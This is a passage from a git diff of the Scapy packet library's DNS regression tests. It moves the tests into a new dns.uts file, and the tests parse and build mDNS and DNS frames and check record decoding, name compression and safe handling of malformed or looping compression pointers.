-assert pkt.an[1].rdata == b'Zalmoid.local.' -assert pkt.an[2].rdata == b'Zalmoid.local.' -assert pkt.ar[1].nextname == b'1.A.9.4.7.E.A.4.B.A.F.B.2.1.4.0.0.6.E.F.7.1.F.2.5.3.E.0.1.0.A.2.ip6.arpa.' -assert pkt.ar[2].nextname == b'136.0.168.192.in-addr.arpa.' -pkt.show() - -= DNS frame with DNSRRSRV -~ dns - -b = Ether(b'33\x00\x00\x00\xfb$\xe3\x14M\x84\xc0\x86\xdd`\t\xc0f\x02b\x11\xff\xfe\x80\x00\x00\x00\x00\x00\x00\x04*,\x03\xab+/\x14\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfb\x14\xe9\x14\xe9\x02b_\xd8\x00\x00\x84\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x014\x011\x01F\x012\x01B\x012\x01B\x01A\x013\x010\x01C\x012\x01A\x012\x014\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x018\x01E\x01F\x03ip6\x04arpa\x00\x00\x0c\x80\x01\x00\x00\x00x\x00\x14\x0csCapys-fLuff\x05local\x00\x03177\x010\x03168\x03192\x07in-addr\xc0P\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`\x01E\x01F\x017\x01D\x01B\x018\x014\x01C\x014\x01B\x016\x01E\x015\x017\x018\x010\x010\x016\x01E\x01F\x017\x011\x01F\x012\x015\x013\x01E\x010\x011\x010\x01A\x012\xc0L\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`+24:e3:14:4d:84:c0@fe80::26e3:14ff:fe4d:84c0\x0e_apple-mobdev2\x04_tcp\xc0m\x00\x10\x80\x01\x00\x00\x11\x94\x00\x01\x00\t_services\x07_dns-sd\x04_udp\xc0m\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x02\xc1\x12\x08521805b3\x04_sub\xc1\x12\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x02\xc0\xe6\xc1\x12\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x02\xc0\xe6\xc0\xe6\x00!\x80\x01\x00\x00\x00x\x00\x08\x00\x00\x00\x00~\xf2\xc0`\xc0`\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\x04*,\x03\xab+/\x14\xc0`\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xb1\xc0`\x00\x1c\x80\x01\x00\x00\x00x\x00\x10*\x01\x0e5/\x17\xfe`\x08u\xe6\xb4\xc4\x8b\xd7\xfe\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x0c\x00\x02\x00\x08\xc0t\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0t\x00\x02\x00\x08\xc0\x98\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x98\x00\x02\x00\x08\xc0\xe6\x00/\x80\x01\x00\x00\x11\x94\x00\t\xc0\xe6\x00\x05\x00\x00\x80\x00@\xc0`\x00/\x80\x01\x00\x00\x00x\x00\x08\xc0`\x00\x04@\x00\x00\x08\x00\x00)\x05\xa0\x00\x00\x11\x94\x00\x12\x00\x04\x00\x0e\x00\xcf&\xe3\x14M\x84\xc0$\xe3\x14M\x84\xc0') -assert isinstance(b.an[7], DNSRRSRV) -assert b.an[7].target == b'sCapys-fLuff.local.' -assert b.an[6].rrname == b'_apple-mobdev2._tcp.local.' -assert b.an[6].rdata == b'24:e3:14:4d:84:c0@fe80::26e3:14ff:fe4d:84c0._apple-mobdev2._tcp.local.' - -= DNS frame with decompression hidden args -~ dns - -c = b'\x01\x00^\x00\x00\xfb\x14\x0cv\x8f\xfe(\x08\x00E\x00\x01C\xe3\x91@\x00\xff\x11\xf4u\xc0\xa8\x00\xfe\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01/L \x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x00\x05_raop\x04_tcp\x05local\x00\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x1e\x1b140C768FFE28@Freebox Server\xc0\x0c\xc0(\x00\x10\x80\x01\x00\x00\x11\x94\x00\xa0\ttxtvers=1\x08vs=190.9\x04ch=2\x08sr=44100\x05ss=16\x08pw=false\x06et=0,1\x04ek=1\ntp=TCP,UDP\x13am=FreeboxServer1,2\ncn=0,1,2,3\x06md=0,2\x07sf=0x44\x0bft=0xBF0A00\x08sv=false\x07da=true\x08vn=65537\x04vv=2\xc0(\x00!\x80\x01\x00\x00\x00x\x00\x19\x00\x00\x00\x00\x13\x88\x10Freebox-Server-3\xc0\x17\xc1\x04\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xfe' -pkt = Ether(c) -assert DNS in pkt -assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' -assert pkt.an.getlayer(DNSRR, type=1).rrname == b'Freebox-Server-3.local.' -assert pkt.an.getlayer(DNSRR, type=1).rdata == '192.168.0.254' -assert pkt.an.getlayer(DNSRR, type=16).rdata == [b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'] - -= DNS advanced building -~ dns - -pkt = DNS(qr=1, aa=1, rd=1) -pkt.an = DNSRR(type=12, rrname='_raop._tcp.local.', rdata='140C768FFE28@Freebox Server._raop._tcp.local.')/DNSRR(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', type=16, rdata=[b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'])/DNSRRSRV(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', target='Freebox-Server-3.local.', port=5000, type=33, rclass=32769)/DNSRR(rrname='Freebox-Server-3.local.', rdata='192.168.0.254', rclass=32769, type=1, ttl=120) - -pkt = DNS(raw(pkt)) - -assert DNSRRSRV in pkt.an -assert pkt[DNSRRSRV].target == b'Freebox-Server-3.local.' -assert pkt[DNSRRSRV].rrname == b'140C768FFE28@Freebox Server._raop._tcp.local.' -assert isinstance(pkt[DNSRRSRV].payload, DNSRR) -assert pkt[DNSRRSRV].payload.rrname == b'Freebox-Server-3.local.' -assert pkt[DNSRRSRV].payload.rdata == '192.168.0.254' - -= Basic DNS Compression -~ dns - -assert len(pkt) == 426 - -z = pkt.compress() - -assert len(z) == 295 -assert z.an[0].rrname == b'_raop._tcp.local.' -assert z.an[0].rdata == b'\x1b140C768FFE28@Freebox Server\xc0\x0c' -assert z.an[1].rrname == z.an[2].rrname == b'\xc0(' -assert z.an[2].target == b'\x10Freebox-Server-3\xc0\x17' -assert z.an[3].rrname == b'\xc1\x04' - -raw(z) - -assert raw(z) == b'\x00\x00\x85\x00\x00\x00\x00\x04\x00\x00\x00\x00\x05_raop\x04_tcp\x05local\x00\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x1e\x1b140C768FFE28@Freebox Server\xc0\x0c\xc0(\x00\x10\x00\x01\x00\x00\x00\x00\x00\xa0\ttxtvers=1\x08vs=190.9\x04ch=2\x08sr=44100\x05ss=16\x08pw=false\x06et=0,1\x04ek=1\ntp=TCP,UDP\x13am=FreeboxServer1,2\ncn=0,1,2,3\x06md=0,2\x07sf=0x44\x0bft=0xBF0A00\x08sv=false\x07da=true\x08vn=65537\x04vv=2\xc0(\x00!\x80\x01\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x13\x88\x10Freebox-Server-3\xc0\x17\xc1\x04\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xfe' - -recompressed = DNS(raw(z)) -recompressed.clear_cache() -recompressed.an[0].rdlen = None -recompressed.an[1].rdlen = None -recompressed.an[2].rdlen = None -recompressed.an[3].rdlen = None - -assert raw(recompressed) == raw(pkt) - -= DNS frames with MX records -~ dns - -frame = b'E\x00\x00\xa4\x93\x1d\x00\x00y\x11\xdc\xfc\x08\x08\x08\x08\xc0\xa8\x00w\x005\xb4\x9b\x00\x90k\x80\x00\x00\x81\x80\x00\x01\x00\x05\x00\x00\x00\x00\x06google\x03com\x00\x00\x0f\x00\x01\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\x11\x00\x1e\x04alt2\x05aspmx\x01l\xc0\x0c\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x00\x14\x04alt1\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x002\x04alt4\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x00(\x04alt3\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\x04\x00\n\xc0/' -pkt = IP(frame) -results = [x.exchange for x in pkt.an.iterpayloads()] -assert results == [b'alt2.aspmx.l.google.com.', b'alt1.aspmx.l.google.com.', b'alt4.aspmx.l.google.com.', b'alt3.aspmx.l.google.com.', b'aspmx.l.google.com.'] - -pkt.clear_cache() -assert raw(dns_compress(pkt)) == frame - -= Advanced dns_get_str tests -~ dns - -assert dns_get_str(b"\x06cheese\x00blobofdata....\x06hamand\xc0\x0c", 22, _fullpacket=True)[0] == b'hamand.cheese.' - -compressed_pkt = b'\x01\x00^\x00\x00\xfb\xa0\x10\x81\xd9\xd3y\x08\x00E\x00\x01\x14\\\n@\x00\xff\x116n\xc0\xa8F\xbc\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01\x00Ho\x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x03\x03188\x0270\x03168\x03192\x07in-addr\x04arpa\x00\x00\x0c\x80\x01\x00\x00\x00x\x00\x0f\x07Android\x05local\x00\x019\x017\x013\x01D\x019\x01D\x01E\x01F\x01F\x01F\x011\x018\x010\x011\x012\x01A\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x018\x01E\x01F\x03ip6\xc0#\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc03\xc03\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8F\xbc\xc03\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\xa2\x10\x81\xff\xfe\xd9\xd3y\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x0c\x00\x02\x00\x08\xc0B\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0B\x00\x02\x00\x08\xc03\x00/\x80\x01\x00\x00\x00x\x00\x08\xc03\x00\x04@\x00\x00\x08' - -Ether(compressed_pkt) - -= Decompression loop in dns_get_str -~ dns - -assert dns_get_str(b"\x04data\xc0\x0c", 0, _fullpacket=True)[0] == b"data.data." - -= Prematured end in dns_get_str -~ dns - -assert dns_get_str(b"\x06da", 0, _fullpacket=True)[0] == b"da." -assert dns_get_str(b"\x04data\xc0\x01", 0, _fullpacket=True)[0] == b"data." - -= Other decompression loop in dns_get_str -~ dns -s = b'\x00\x00\x84\x00\x00\x00\x00\x02\x00\x00\x00\x06\x0bGourmandise\x04_smb\x04_tcp\x05local\x00\x00!\x80\x01\x00\x00\x00x\x00\x14\x00\x00\x00\x00\x01\xbd\x0bGourmandise\xc0"\x0bGourmandise\x0b_afpovertcp\xc0\x1d\x00!\x80\x01\x00\x00\x00x\x00\x08\x00\x00\x00\x00\x02$\xc09\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\x00s#\x99\xca\xf7\xea\xdc\xc09\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x01x\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10*\x01\xcb\x00\x0bD\x1f\x00\x18k\xb1\x99\x90\xdf\x84.\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\t\xc0\x0c\x00\x05\x00\x00\x80\x00@\xc0G\x00/\x80\x01\x00\x00\x00x\x00\t\xc0G\x00\x05\x00\x00\x80\x00@\xc09\x00/\x80\x01\x00\x00\x00x\x00\x08\xc09\x00\x04@\x00\x00\x08' -DNS(s) - -= DNS record type 16 (TXT) - -p = DNS(raw(DNS(id=1,ra=1,an=DNSRR(rrname='scapy', type='TXT', rdata="niceday", ttl=1)))) -assert p[DNS].an.rdata == [b"niceday"] - -p = DNS(raw(DNS(id=1,ra=1,an=DNSRR(rrname='secdev', type='TXT', rdata=["sweet", "celestia"], ttl=1)))) -assert p[DNS].an.rdata == [b"sweet", b"celestia"] -assert raw(p) == b'\x00\x01\x01\x80\x00\x00\x00\x01\x00\x00\x00\x00\x06secdev\x00\x00\x10\x00\x01\x00\x00\x00\x01\x00\x0f\x05sweet\x08celestia' - -= DNS - Malformed DNS over TCP message - -try: - p = IP(IP(raw(IP()/TCP()/DNS(length=28))[:-13])) - assert False -except Scapy_Exception as e: - assert str(e) == "Malformed DNS message: too small!" - -try: - p = IP(raw(IP()/TCP()/DNS(length=28, qdcount=1))) - assert False -except Scapy_Exception as e: - assert str(e) == "Malformed DNS message: invalid length!" - = Layer binding diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts new file mode 100644 index 00000000000..9123ee67995 --- /dev/null +++ b/test/scapy/layers/dns.uts @@ -0,0 +1,182 @@ +% DNS regression tests for Scapy + ++ DNS +~dns + += DNS request +~ netaccess IP UDP DNS +* A possible cause of failure could be that the open DNS (resolver1.opendns.com) +* is not reachable or down. +def _test(): + old_debug_dissector = conf.debug_dissector + conf.debug_dissector = False + dns_ans = sr1(IP(dst="resolver1.opendns.com")/UDP()/DNS(rd=1,qd=DNSQR(qname="www.slashdot.com")),timeout=5) + conf.debug_dissector = old_debug_dissector + DNS in dns_ans + return dns_ans + +dns_ans = retry_test(_test) + += DNS packet manipulation +~ netaccess IP UDP DNS +dns_ans.show() +dns_ans.show2() +dns_ans[DNS].an.show() +dns_ans2 = IP(raw(dns_ans)) +DNS in dns_ans2 +assert(raw(dns_ans2) == raw(dns_ans)) +dns_ans2.qd.qname = "www.secdev.org." +* We need to recalculate these values +del(dns_ans2[IP].len) +del(dns_ans2[IP].chksum) +del(dns_ans2[UDP].len) +del(dns_ans2[UDP].chksum) +assert(b"\x03www\x06secdev\x03org\x00" in raw(dns_ans2)) +assert(DNS in IP(raw(dns_ans2))) +assert raw(DNSRR(type='A', rdata='1.2.3.4')) == b'\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x04\x01\x02\x03\x04' + +* DNS over UDP +pkt = IP(raw(IP(src="10.0.0.1", dst="8.8.8.8")/UDP(sport=RandShort(), dport=53)/DNS(qd=DNSQR(qname="secdev.org.")))) +assert UDP in pkt and isinstance(pkt[UDP].payload, DNS) +assert pkt[UDP].dport == 53 and pkt[UDP].length is None +assert pkt[DNS].qdcount == 1 and pkt[DNS].qd.qname == b"secdev.org." + +* DNS over TCP +pkt = IP(raw(IP(src="10.0.0.1", dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="P")/DNS(qd=DNSQR(qname="secdev.org.")))) +assert TCP in pkt and isinstance(pkt[TCP].payload, DNS) +assert pkt[TCP].dport == 53 and pkt[DNS].length is not None +assert pkt[DNS].qdcount == 1 and pkt[DNS].qd.qname == b"secdev.org." + += DNS frame with advanced decompression +~ dns + +a = b'\x01\x00^\x00\x00\xfb$\xa2\xe1\x90\xa9]\x08\x00E\x00\x01P\\\xdd\x00\x00\xff\x11\xbb\x93\xc0\xa8\x00\x88\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01<*\x81\x00\x00\x84\x00\x00\x00\x00\x03\x00\x00\x00\x04\x01B\x019\x015\x019\x013\x014\x017\x013\x016\x017\x010\x012\x010\x01D\x018\x011\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x018\x01E\x01F\x03ip6\x04arpa\x00\x00\x0c\x80\x01\x00\x00\x00x\x00\x0f\x07Zalmoid\x05local\x00\x011\x01A\x019\x014\x017\x01E\x01A\x014\x01B\x01A\x01F\x01B\x012\x011\x014\x010\x010\x016\x01E\x01F\x017\x011\x01F\x012\x015\x013\x01E\x010\x011\x010\x01A\x012\xc0L\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`\x03136\x010\x03168\x03192\x07in-addr\xc0P\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x0c\x00\x02\x00\x08\xc0o\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0o\x00\x02\x00\x08\xc0\xbd\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\xbd\x00\x02\x00\x08\x00\x00)\x05\xa0\x00\x00\x11\x94\x00\x12\x00\x04\x00\x0e\x00\xc1&\xa2\xe1\x90\xa9]$\xa2\xe1\x90\xa9]' +pkt = Ether(a) +assert pkt.ancount == 3 +assert pkt.arcount == 4 +assert pkt.an[1].rdata == b'Zalmoid.local.' +assert pkt.an[2].rdata == b'Zalmoid.local.' +assert pkt.ar[1].nextname == b'1.A.9.4.7.E.A.4.B.A.F.B.2.1.4.0.0.6.E.F.7.1.F.2.5.3.E.0.1.0.A.2.ip6.arpa.' +assert pkt.ar[2].nextname == b'136.0.168.192.in-addr.arpa.' +pkt.show() + += DNS frame with DNSRRSRV +~ dns + +b = Ether(b'33\x00\x00\x00\xfb$\xe3\x14M\x84\xc0\x86\xdd`\t\xc0f\x02b\x11\xff\xfe\x80\x00\x00\x00\x00\x00\x00\x04*,\x03\xab+/\x14\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfb\x14\xe9\x14\xe9\x02b_\xd8\x00\x00\x84\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x014\x011\x01F\x012\x01B\x012\x01B\x01A\x013\x010\x01C\x012\x01A\x012\x014\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x018\x01E\x01F\x03ip6\x04arpa\x00\x00\x0c\x80\x01\x00\x00\x00x\x00\x14\x0csCapys-fLuff\x05local\x00\x03177\x010\x03168\x03192\x07in-addr\xc0P\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`\x01E\x01F\x017\x01D\x01B\x018\x014\x01C\x014\x01B\x016\x01E\x015\x017\x018\x010\x010\x016\x01E\x01F\x017\x011\x01F\x012\x015\x013\x01E\x010\x011\x010\x01A\x012\xc0L\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc0`+24:e3:14:4d:84:c0@fe80::26e3:14ff:fe4d:84c0\x0e_apple-mobdev2\x04_tcp\xc0m\x00\x10\x80\x01\x00\x00\x11\x94\x00\x01\x00\t_services\x07_dns-sd\x04_udp\xc0m\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x02\xc1\x12\x08521805b3\x04_sub\xc1\x12\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x02\xc0\xe6\xc1\x12\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x02\xc0\xe6\xc0\xe6\x00!\x80\x01\x00\x00\x00x\x00\x08\x00\x00\x00\x00~\xf2\xc0`\xc0`\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\x04*,\x03\xab+/\x14\xc0`\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xb1\xc0`\x00\x1c\x80\x01\x00\x00\x00x\x00\x10*\x01\x0e5/\x17\xfe`\x08u\xe6\xb4\xc4\x8b\xd7\xfe\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x0c\x00\x02\x00\x08\xc0t\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0t\x00\x02\x00\x08\xc0\x98\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x98\x00\x02\x00\x08\xc0\xe6\x00/\x80\x01\x00\x00\x11\x94\x00\t\xc0\xe6\x00\x05\x00\x00\x80\x00@\xc0`\x00/\x80\x01\x00\x00\x00x\x00\x08\xc0`\x00\x04@\x00\x00\x08\x00\x00)\x05\xa0\x00\x00\x11\x94\x00\x12\x00\x04\x00\x0e\x00\xcf&\xe3\x14M\x84\xc0$\xe3\x14M\x84\xc0') +assert isinstance(b.an[7], DNSRRSRV) +assert b.an[7].target == b'sCapys-fLuff.local.' +assert b.an[6].rrname == b'_apple-mobdev2._tcp.local.' +assert b.an[6].rdata == b'24:e3:14:4d:84:c0@fe80::26e3:14ff:fe4d:84c0._apple-mobdev2._tcp.local.' + += DNS frame with decompression hidden args +~ dns + +c = b'\x01\x00^\x00\x00\xfb\x14\x0cv\x8f\xfe(\x08\x00E\x00\x01C\xe3\x91@\x00\xff\x11\xf4u\xc0\xa8\x00\xfe\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01/L \x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x00\x05_raop\x04_tcp\x05local\x00\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x1e\x1b140C768FFE28@Freebox Server\xc0\x0c\xc0(\x00\x10\x80\x01\x00\x00\x11\x94\x00\xa0\ttxtvers=1\x08vs=190.9\x04ch=2\x08sr=44100\x05ss=16\x08pw=false\x06et=0,1\x04ek=1\ntp=TCP,UDP\x13am=FreeboxServer1,2\ncn=0,1,2,3\x06md=0,2\x07sf=0x44\x0bft=0xBF0A00\x08sv=false\x07da=true\x08vn=65537\x04vv=2\xc0(\x00!\x80\x01\x00\x00\x00x\x00\x19\x00\x00\x00\x00\x13\x88\x10Freebox-Server-3\xc0\x17\xc1\x04\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xfe' +pkt = Ether(c) +assert DNS in pkt +assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' +assert pkt.an.getlayer(DNSRR, type=1).rrname == b'Freebox-Server-3.local.' +assert pkt.an.getlayer(DNSRR, type=1).rdata == '192.168.0.254' +assert pkt.an.getlayer(DNSRR, type=16).rdata == [b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'] + += DNS advanced building +~ dns + +pkt = DNS(qr=1, aa=1, rd=1) +pkt.an = DNSRR(type=12, rrname='_raop._tcp.local.', rdata='140C768FFE28@Freebox Server._raop._tcp.local.')/DNSRR(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', type=16, rdata=[b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'])/DNSRRSRV(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', target='Freebox-Server-3.local.', port=5000, type=33, rclass=32769)/DNSRR(rrname='Freebox-Server-3.local.', rdata='192.168.0.254', rclass=32769, type=1, ttl=120) + +pkt = DNS(raw(pkt)) + +assert DNSRRSRV in pkt.an +assert pkt[DNSRRSRV].target == b'Freebox-Server-3.local.' +assert pkt[DNSRRSRV].rrname == b'140C768FFE28@Freebox Server._raop._tcp.local.' +assert isinstance(pkt[DNSRRSRV].payload, DNSRR) +assert pkt[DNSRRSRV].payload.rrname == b'Freebox-Server-3.local.' +assert pkt[DNSRRSRV].payload.rdata == '192.168.0.254' + += Basic DNS Compression +~ dns + +assert len(pkt) == 426 + +z = pkt.compress() + +assert len(z) == 295 +assert z.an[0].rrname == b'_raop._tcp.local.' +assert z.an[0].rdata == b'\x1b140C768FFE28@Freebox Server\xc0\x0c' +assert z.an[1].rrname == z.an[2].rrname == b'\xc0(' +assert z.an[2].target == b'\x10Freebox-Server-3\xc0\x17' +assert z.an[3].rrname == b'\xc1\x04' + +raw(z) + +assert raw(z) == b'\x00\x00\x85\x00\x00\x00\x00\x04\x00\x00\x00\x00\x05_raop\x04_tcp\x05local\x00\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x1e\x1b140C768FFE28@Freebox Server\xc0\x0c\xc0(\x00\x10\x00\x01\x00\x00\x00\x00\x00\xa0\ttxtvers=1\x08vs=190.9\x04ch=2\x08sr=44100\x05ss=16\x08pw=false\x06et=0,1\x04ek=1\ntp=TCP,UDP\x13am=FreeboxServer1,2\ncn=0,1,2,3\x06md=0,2\x07sf=0x44\x0bft=0xBF0A00\x08sv=false\x07da=true\x08vn=65537\x04vv=2\xc0(\x00!\x80\x01\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x13\x88\x10Freebox-Server-3\xc0\x17\xc1\x04\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xfe' + +recompressed = DNS(raw(z)) +recompressed.clear_cache() +recompressed.an[0].rdlen = None +recompressed.an[1].rdlen = None +recompressed.an[2].rdlen = None +recompressed.an[3].rdlen = None + +assert raw(recompressed) == raw(pkt) + += DNS frames with MX records +~ dns + +frame = b'E\x00\x00\xa4\x93\x1d\x00\x00y\x11\xdc\xfc\x08\x08\x08\x08\xc0\xa8\x00w\x005\xb4\x9b\x00\x90k\x80\x00\x00\x81\x80\x00\x01\x00\x05\x00\x00\x00\x00\x06google\x03com\x00\x00\x0f\x00\x01\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\x11\x00\x1e\x04alt2\x05aspmx\x01l\xc0\x0c\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x00\x14\x04alt1\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x002\x04alt4\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x00(\x04alt3\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\x04\x00\n\xc0/' +pkt = IP(frame) +results = [x.exchange for x in pkt.an.iterpayloads()] +assert results == [b'alt2.aspmx.l.google.com.', b'alt1.aspmx.l.google.com.', b'alt4.aspmx.l.google.com.', b'alt3.aspmx.l.google.com.', b'aspmx.l.google.com.'] + +pkt.clear_cache() +assert raw(dns_compress(pkt)) == frame + += Advanced dns_get_str tests +~ dns + +assert dns_get_str(b"\x06cheese\x00blobofdata....\x06hamand\xc0\x0c", 22, _fullpacket=True)[0] == b'hamand.cheese.' + +compressed_pkt = b'\x01\x00^\x00\x00\xfb\xa0\x10\x81\xd9\xd3y\x08\x00E\x00\x01\x14\\\n@\x00\xff\x116n\xc0\xa8F\xbc\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01\x00Ho\x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x03\x03188\x0270\x03168\x03192\x07in-addr\x04arpa\x00\x00\x0c\x80\x01\x00\x00\x00x\x00\x0f\x07Android\x05local\x00\x019\x017\x013\x01D\x019\x01D\x01E\x01F\x01F\x01F\x011\x018\x010\x011\x012\x01A\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x018\x01E\x01F\x03ip6\xc0#\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc03\xc03\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8F\xbc\xc03\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\xa2\x10\x81\xff\xfe\xd9\xd3y\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x0c\x00\x02\x00\x08\xc0B\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0B\x00\x02\x00\x08\xc03\x00/\x80\x01\x00\x00\x00x\x00\x08\xc03\x00\x04@\x00\x00\x08' + +Ether(compressed_pkt) + += Decompression loop in dns_get_str +~ dns + +assert dns_get_str(b"\x04data\xc0\x0c", 0, _fullpacket=True)[0] == b"data.data." + += Prematured end in dns_get_str +~ dns + +assert dns_get_str(b"\x06da", 0, _fullpacket=True)[0] == b"da." +assert dns_get_str(b"\x04data\xc0\x01", 0, _fullpacket=True)[0] == b"data." + += Other decompression loop in dns_get_str +~ dns +s = b'\x00\x00\x84\x00\x00\x00\x00\x02\x00\x00\x00\x06\x0bGourmandise\x04_smb\x04_tcp\x05local\x00\x00!\x80\x01\x00\x00\x00x\x00\x14\x00\x00\x00\x00\x01\xbd\x0bGourmandise\xc0"\x0bGourmandise\x0b_afpovertcp\xc0\x1d\x00!\x80\x01\x00\x00\x00x\x00\x08\x00\x00\x00\x00\x02$\xc09\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\x00s#\x99\xca\xf7\xea\xdc\xc09\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x01x\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10*\x01\xcb\x00\x0bD\x1f\x00\x18k\xb1\x99\x90\xdf\x84.\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\t\xc0\x0c\x00\x05\x00\x00\x80\x00@\xc0G\x00/\x80\x01\x00\x00\x00x\x00\t\xc0G\x00\x05\x00\x00\x80\x00@\xc09\x00/\x80\x01\x00\x00\x00x\x00\x08\xc09\x00\x04@\x00\x00\x08' +DNS(s) + += DNS record type 16 (TXT) + +p = 